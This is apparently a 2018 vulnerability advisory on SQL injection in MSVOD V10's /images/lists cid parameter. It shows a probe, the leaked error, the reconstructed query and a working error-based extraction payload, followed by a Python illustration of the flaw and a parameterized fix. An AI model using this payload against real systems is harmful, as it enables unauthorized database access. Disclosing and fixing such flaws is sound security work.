MSVOD V10 – SQL Injection

Hzllaga Tuesday, July 17, 2018

MSVOD V10 – SQL Injection via /images/lists

The `$cid` parameter is attacker-controllable and is concatenated into the SQL query without validation or escaping.

Open the page: `/images/lists?cid='`

MySQL then returns a syntax error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1' at line 1
From the error message we can recover the failing SQL statement:
SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE ( ms_atlas.status = 1 and ms_atlas.is_check=1 and (ms_atlas.class = ' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1
Final payload:

Official demo: `,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20`
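To make the root cause concrete, here is an added illustration in Python that is not part of the original advisory or of MSVOD's code: an assumed reconstruction of the string-concatenated query that produces the leaked statement above, beside a hardened version that validates `cid` as an integer and binds every value as a query parameter. The `ms_atlas` rows, column names and the `?` placeholder style (sqlite3; MySQL drivers such as PyMySQL use `%s`) are constructed for the example.

```python
import re
import sqlite3

# Constant IN-list as it appears in the error message on the page.
CLASS_LIST = [12, 13, 19, 22, 23, 24, 35]


def build_count_query_vulnerable(cid: str) -> str:
    """Assumed reconstruction of the defect: cid is spliced into the SQL text
    verbatim, so a single quote lands inside the statement unescaped."""
    in_list = ",".join(str(c) for c in CLASS_LIST)
    return (
        "SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE ( "
        "ms_atlas.status = 1 and ms_atlas.is_check=1 and "
        f"(ms_atlas.class = {cid} or ms_atlas.class in ({in_list})) ) LIMIT 1"
    )


def is_valid_cid(raw: str) -> bool:
    """A category id is a plain positive integer; anything else is rejected."""
    return re.fullmatch(r"[1-9][0-9]{0,9}", raw) is not None


def build_count_query_safe(raw_cid: str):
    """Hardened form: validate cid first, then bind every value as a parameter
    so user input can never change the structure of the statement."""
    if not is_valid_cid(raw_cid):
        raise ValueError("cid must be a positive integer")
    placeholders = ",".join("?" * len(CLASS_LIST))
    sql = (
        "SELECT COUNT(*) AS tp_count FROM ms_atlas WHERE "
        "status = 1 AND is_check = 1 AND "
        f"(class = ? OR class IN ({placeholders}))"
    )
    return sql, (int(raw_cid), *CLASS_LIST)


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for ms_atlas (real schema is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ms_atlas (id INTEGER, status INTEGER, is_check INTEGER, class INTEGER)")
    conn.executemany("INSERT INTO ms_atlas VALUES (?, ?, ?, ?)",
                     [(1, 1, 1, 5), (2, 1, 1, 12), (3, 0, 1, 5), (4, 1, 1, 7)])
    return conn


def count_atlas(conn: sqlite3.Connection, raw_cid: str) -> int:
    """Run the hardened query; raises ValueError on a malformed cid."""
    sql, params = build_count_query_safe(raw_cid)
    return conn.execute(sql, params).fetchone()[0]
```

Calling `build_count_query_vulnerable("'")` yields exactly the statement quoted in the error message, while `count_atlas(demo_db(), "'")` refuses the input before any SQL is built.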
